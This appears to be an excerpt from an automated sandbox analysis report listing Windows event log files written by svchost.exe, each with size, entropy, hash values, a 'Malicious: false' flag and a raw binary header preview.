Preview:	ElfChnk......................................c..xe...q......................................................................oK............................................=...........................................................................................................................f...............?...........................m...................M...F............................(...............#..s...........&........................................................@.......&......................**..............[..v..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.188837489747044
Encrypted:	false
SSDEEP:	384:2hc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinG:26Ovc0S5UyEeDgLWkLk9
MD5:	D0B6CF11E5B6DE4B51B05FB2C47A2BDF
SHA1:	678406485A753F61BC74AFBB64C5F182D9A0FD24
SHA-256:	06082ED08B33147F62D83030F911BB344A2CCF26C29652DAD0DC1285B7BBA9AB
SHA-512:	0E0E3EA927BDBC85B9D10635215344B918D7D0DB19534F69FFEE650288AA7A2139CD1757B6586D915BB9D4FD7F6E9B7DC84E49A04D625E6DE123EFEA01F0105A
Malicious:	false
Preview:	ElfChnk.........=...............=............m...o....[.......................................................................A.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................................................_..............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7841641176118008
Encrypted:	false
SSDEEP:	384:EhGuZumutu4uEu5uOuDuyb2uPu1uwuaGuQudu:Ep
MD5:	0FE6BF993DBFCF2C33E9E74ECEA52529
SHA1:	D52E3E4590B1A69E2848BFDA7CFC0548807B6DFD
SHA-256:	05E0A817862593E78EAB4933AC6760FCDD374BE603D30CA54D5EBC0D95AE45D6
SHA-512:	856B8479B8EA74343C2B744B7331BC5E716E5D6801CD3C618D87FC1E9076411EF23A434B964E3779F3886BE5E14E29F0FF1BD57A354A0B710E95C0F717857962
Malicious:	false
Preview:	ElfChnk.....................................H!..."...`.......................................................................}..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................>...............................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2221646737158745
Encrypted:	false
SSDEEP:	768:KNTY9iSRTwxcuiuEPNqNlAi0LbzwJNUoBKP/LSjlc/ifAwDx95k1O1CzF/R:2TgVwaBR3
MD5:	F65A5D0805BEA87BD0E6C21AE847753F
SHA1:	1C37174B5C563EE4AA15B6FF6A8D66CA5382439C
SHA-256:	C74433E11A2096EDF95CF02950114F63C9385565B3E8A0B8B526F3BBC0205643
SHA-512:	BCB8C863BC8B374B57BF1E291165C84E662C15138B5BC49A7DDA594B174938744A65135238C7CF4B3E8279366F22367129563033112DCD13E21EB7DE7C490F47
Malicious:	false
Preview:	ElfChnk.........]...............]..............P.....j.......................................................................!&................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...........................M.......................5...............................................................&.......................U.......**................n[...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1618450420634976
Encrypted:	false
SSDEEP:	384:OhipiCpX0pLpXbNpXi5pX5VpX4FHpX/dpXWOopXtFpX8ppXjZpXupXhpXcJ1pXbo:O77hJ94B
MD5:	9DE62CBD5978823B4DA8C39DE86C24EA
SHA1:	FBD6509720551BAEE8A59A4EE0C87947971995F7
SHA-256:	D78DD696963922E66A70A8394FA137C70BEE5AFBC7AA7929C9647EA7F8406AE5
SHA-512:	964F6ECD0B2FB275281D784E42A54521FFCD2D83B2AA46872831B6B2D5CBDF5511B50CD20EB3CCEE4FE94388CC6B9CAF6325D9A9385DD7D2766993A467A17ED9
Malicious:	false
Preview:	ElfChnk.........'...............'...................... ....................................................................H.].........................................:...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**...............I.s...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.007193143439547
Encrypted:	false
SSDEEP:	384:VhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBW:VwDoh1VLnCOulD+rCCMBg
MD5:	6B4D84475BE2D7E5C85EF52EE79378AC
SHA1:	6BAAF98BB904C4283F60562A2477F40F934FE43D
SHA-256:	52EAF39F877C5CDB3F90364C066290510791A89D0A13A78A7A1D45B812C2661C
SHA-512:	E94D0A0CC6BB3BB012D033214594A46615623E6696B68E3A2661A70CCE8C5260ABFB7576B1B25C4B9E19AF8CC0E872A37FEE4ED5730561714AE647EB19B87A58
Malicious:	false
Preview:	ElfChnk.\...............\.........................../..).....................................................................Z.........................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1648324142190984
Encrypted:	false
SSDEEP:	384:jhwCCRzCaCkClCzCYC/CyCVCGCMCvCqC5qC/CECJC4C:jKFr
MD5:	AB886AC45DA90F458294147C1B80096E
SHA1:	688FA6277921E9F8F9DB662E2DF93D9C5884E1C8
SHA-256:	6645140EFED797986D8621B2D11881B57AA7DDF1C96F85782EAF9AB44AB81940
SHA-512:	41984646C4D7B86A8247BFB8B8A469BEA157D8CE7D925085D828C9FA8DF473D4582E6F00D753A5D1F5EB0DFD7A250D847194B7FEE4DF4960111A13A22D945C44
Malicious:	false
Preview:	ElfChnk.....................................04..h6....).......................................................................+................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................v)........................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90760
Entropy (8bit):	4.686083769572675
Encrypted:	false
SSDEEP:	384:FhOMqXYyMhYJMhYuMcYVMcYDMAdMjMyXYmGMlYMfMyXYjMyXYXNMyXYDMcY/MyXn:F2BX1NhBrNlRtnX2BDe
MD5:	06E0B2E3637C32275A7C91BDF8A8B36B
SHA1:	5AD1D023B3D3CA77B3063F20B93F4E7DB5B0133E
SHA-256:	ACE70C252E7338DBADF83A15EBB518BDEBA724F416EA0FD23D512EA7914DB9A0
SHA-512:	E784E66CB290E1BAD39F88271A0D4295ABD5296E5CE4E901B625ACE876643A602F1E447E5AD1B5E7EDA3BE4865209AC1274D94AF3D38D86BF3F5C02A16135E3C
Malicious:	false
Preview:	ElfChnk..K......<K.......K......<K..........`P...R..wt.......................................................................P$1........................................4...=...........................................................................................................................f...............?...........................m...................M...F...........................................................].......................................................&...............................**..8....K........c\|...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1800865571629675
Encrypted:	false
SSDEEP:	384:8hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm3UmgPcUmgqUmgtUmg:8Y7L1
MD5:	9DDED1CF44567702082B417ED7794DFF
SHA1:	BEF6311663E2C4B12F18FEAB50C02B9B1D36AC63
SHA-256:	F273FED31595625DE928BD13FAA75845C8005B67C5EBE15657CD84AF8B7F35AE
SHA-512:	C3C992BCAE29DAE3BC951F9B1C3406A3EBFED5E45C54749B91DCFBA6FADDB059A9430FD016DE87F31801938BBEB5066DF7CA58C9BAA076F32CD4D7A98BE54C08
Malicious:	false
Preview:	ElfChnk......................................1..(4.....v.....................................................................3i................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&......................................................................................................................*..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.2038397283319607
Encrypted:	false
SSDEEP:	48:MCXW4PrP+MZQNRBEZWTENO4bpBwoL/6FgVt:hVRKNVaO8goL/6Fg
MD5:	32F09554E271B7B893419DD3870AB3C6
SHA1:	81CEBD4718F7AE61BCE92E821AEFA2BF7A150AC8
SHA-256:	6D87BED3B22EB29240069AE0D657DDBBAE5B806411EA01236BF4013F28A59730
SHA-512:	D6156CAF8801C8E23D4EE4311C24DB9A934E58823807583F4D7678C5B26BCEEF9783EB884A5E07D410A7137E2C051D50925DCF76DB7887227D40C0FBB821F66B
Malicious:	false
Preview:	ElfChnk...............................................@......................................................................Y................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................&...............................*...............S.S...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.091294413760676
Encrypted:	false
SSDEEP:	384:XhkivFiWi+iPin4imi2i7i7iUIiliZyiOyiRidi2iPihiMiJiXiMiwi7ibiQiKi3:X75qE+rYM9QSp
MD5:	2A709BFFBF026324ECAF1434BCED14F6
SHA1:	CF657B1A8F37DDA8FA52E822B55AFD4C2C275621
SHA-256:	7DAFA616F5C68D72FDBD97D4C27B5D6C1E929AB99E4BE9EC10CBB7246F50F4EB
SHA-512:	03B744DF98483374ABEEAFC293A21AB3A43CD85048A3871E6B56072755E5CBA2B1391CA178ED3271F81EE71C7860A92A2EFDA10E74142CC4A9DD456BD0C36B1D
Malicious:	false
Preview:	ElfChnk.y...............y....................].. _....M......................................................................_.J.................!..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F...................................................................................................................^(......o!.......'.......#......**......y........9.~...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.3249991103369725
Encrypted:	false
SSDEEP:	768:X4a8Nfa9a7a9aRaVazadafa6anaiaeababaMa9adaHaRaZa8aqauataya5acasaG:CNO65/
MD5:	5DA8517CC5A86D2E190AA3A67E8F648B
SHA1:	2B60A348EFE4C356574922CD9E78720DAF3865A0
SHA-256:	5F31A5BF53DAAC6AD6C533FE00EFAE5AC6BC8EA2E30B8B53849DDA6557EC2AC6
SHA-512:	616A4F774F7D8A5D3AD1FE5739AAA5113BD9C917C4127D165B53B09E8B6CE1C2B695791BD000F11B763D082C3C1C176DF9031A0B24ABB70457B17C13F66D5A5C
Malicious:	false
Preview:	ElfChnk.........@...............@...............`....R........................................................................T.................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...&...............................**..H...........Rcm?...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3121334852556163
Encrypted:	false
SSDEEP:	384:JhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJNXJYXJgEXJPFXJ/XJYXJ:JQ0yUkNYwD8imLEzAgcTRA
MD5:	FFB6A652DB28F996DFED7C9019078ED2
SHA1:	74CB36B939D6BCF171FE4DCF5598185AB4725C66
SHA-256:	F110378ECBC8310346B0A36ADEC552AB73FFB978D308BD0337F7E4A590154779
SHA-512:	3D896B8C8CBA3A608DE459E017361F985361FD9A1C652461F715BBB083FBE3C1269C34042969484DC845E489B28A755F9B8D129F5CF1D057A6435B4759914D71
Malicious:	false
Preview:	ElfChnk......................................>...A....(z........................................................................................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................................3..C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.334252168562292
Encrypted:	false
SSDEEP:	384:0hHm5m0m4mem7mtmjmMmZmnmPmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfmP6:0BDcxYF9b
MD5:	107A4C99272DCD944C2044D39671A90A
SHA1:	55ABC4D22A8FFA78AF108A9C9A0FE8F3940196FF
SHA-256:	0F103282F41D533441F08CC711E1C2E79576E23FAC931A0E237499ADB533B758
SHA-512:	00D0A143BE7D492F239EB3D6467D354921DEB7445219F2674CD846A9ACC4655B41311D337DB08D06DEEA232AB7EF14A82FDF5DD8DFF216947EEA345FD5655168
Malicious:	false
Preview:	ElfChnk.............................................>.,.......................................................................S................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................s...........................................#.......................&...............................**..p...........P..z...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.785423068240535
Encrypted:	false
SSDEEP:	384:jhK21d2WY2a2e2B2N22w2j232T272n2X2f2:jn
MD5:	391EBA3D7D1882E91BEDC55BE04AB8DC
SHA1:	7A143B92AE3C4389BCD6168460F7BF2679B84D53
SHA-256:	E798AB380F3DB2F6B57B30BAFD684821A6C953276149A3C8AF8F76CF8618B97E
SHA-512:	AF47641366C320F595B9AB97455FEA9FCB35D8465E4EF5F11D953BE94DD7B4FFD5191A318548CBEEA0F5EB5D2EAD59B8DAEF6F7D54B41945B731D580E34E5AFB
Malicious:	false
Preview:	ElfChnk.....................................H ..."..).......................................................................1U..................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................%...................................................................................&...............................**..............4.Wt...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	190000
Entropy (8bit):	4.367034977167119
Encrypted:	false
SSDEEP:	384:Hc9RGCR+lRpRXcMhmRuZhRIRRI4RI4RIcRIERIkRIGhRI6nRIdRI6RISRIuRItRG:HNL8VYu7038VYe8VYhcgS
MD5:	4DF538F6E43021FB7787846BF913C088
SHA1:	5F3C2DD421CBC25DBADA89F61C05FBBA0F3DE236
SHA-256:	C7C175C926B04F527C606C4ACA8E98BEEA67D7B2BF5A90021309193B5205C23D
SHA-512:	5B9DCDD6EEC08A138EF83CFC4B0578828F5BB0E58DAB2718B27A97F9B193EDA12AEB48F2CA5FDDD0E0B9F9CDCA9D4D7DFAD74E4F3BCCC66244330B34ED669AB0
Malicious:	false
Preview:	ElfChnk.;.......p.......;.......p...........................................................................................=7.....................}.......}.............=...........................................~...................}..3.......................................i....`......p_..f...h.......d`..?................................`......M.......M...F...1`..............................................I_..............................................................................&........y...\|..*......m........aw.sc.........a...y..............................................................<.......T...-.!................@.aw.sc..1...O.\K....(.l.........m....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......I_.........................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.254764176118569
Encrypted:	false
SSDEEP:	384:9dbhdhohUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYg:zBsFpkB2
MD5:	FA5B264BFF792D5190F779F60953D5BC
SHA1:	9C4D960740FE32F5B6C0619DECD448877B964ECF
SHA-256:	1C4D28990AE1F990CD2EA514634835B1C54E0E399FA06B48B39797987EBC6A19
SHA-512:	F734A797FB28DC5FC9513243DAB47A175FAD952D226771FAB6A1F44387BE3D13AC48E59556FF2D73996DE2D7E4F71DF7404D515D356FD936EFA90E30BE5054B8
Malicious:	false
Preview:	ElfChnk.....................................x..............................................................................R.w.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................F...............A...............**..H............^...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2582362100593367
Encrypted:	false
SSDEEP:	384:6hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVcVEVx7VfV3VyL:6yjb1
MD5:	10B9D2F2009324CCD2C0513FA09DCAA9
SHA1:	053521653A21F5690434B28B22DA3720F14784EB
SHA-256:	3594527FBC84C97EAFCA17517DC0AF7009A8CF9EC33E64E9B9665CEAEAC7BCFA
SHA-512:	EB56AEC5341DF19B7A1B1D259EAAD19BE17A820450BE7F17F6329E8E4A072ABCF8EBAF490BF15A02D95C8755A06D1E7D049E35D766A403DE53D16C4058E092CF
Malicious:	false
Preview:	ElfChnk........."..............."...........`8...9.............................................................................x................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......................................................&..............................*..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.234167530256916
Encrypted:	false
SSDEEP:	384:phz0BwBC/bBwB58b1mBwBizJ1BwBt/PgBwBt/TBwBiz6BwBizTWuBwB8BwB5BwBx:pR8bmW++v34YO
MD5:	FBFC9E652C02F174D273EB0E56D3BFF8
SHA1:	5F3F35861B70BD3C1CEB2AD5212346BF15D4C4BE
SHA-256:	67DA36BCA8447B9FB0E9F40C899A131338351362F1398C09D659E32A62D4344E
SHA-512:	287D2F7A7DC9FA07E6510F54C5F3F24A6F3CDA4478B835EE4CA117BBBC4B915B4FA5201E6C9BDD69C459C322018DDF4A588524F213823FBF77C7F5A69E524AB9
Malicious:	false
Preview:	ElfChnk.....................................01..`4...^.w......................................................................N.............................................=...........................................................................................................................f...............?...........................m...................M...F....................&......o.......................................................................................&...............................**.................%...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.388072850713901
Encrypted:	false
SSDEEP:	768:UhlZSKhZ9tj1qzH68wEgysylCiEgqgAu3L5H2WYTc:kohHmc
MD5:	4C97FDAB178C66D1713A4AC1891E54FF
SHA1:	3414E8C1341A7B749AFCA384358FE9A02F4EAC46
SHA-256:	F3B6169D7561900EEA9AA65218228F3B755B1EED6429A1792C5C5AD5EED3F63C
SHA-512:	44323DE5D1FDC7FA2A6E10140F1F5E1A4FB7D84D761EB97F6FF65F7FCBBBC872A5579E91F343AED4428F999F63AE00AAB2ADFFAD4BC92983183C444C9A9DEE2B
Malicious:	false
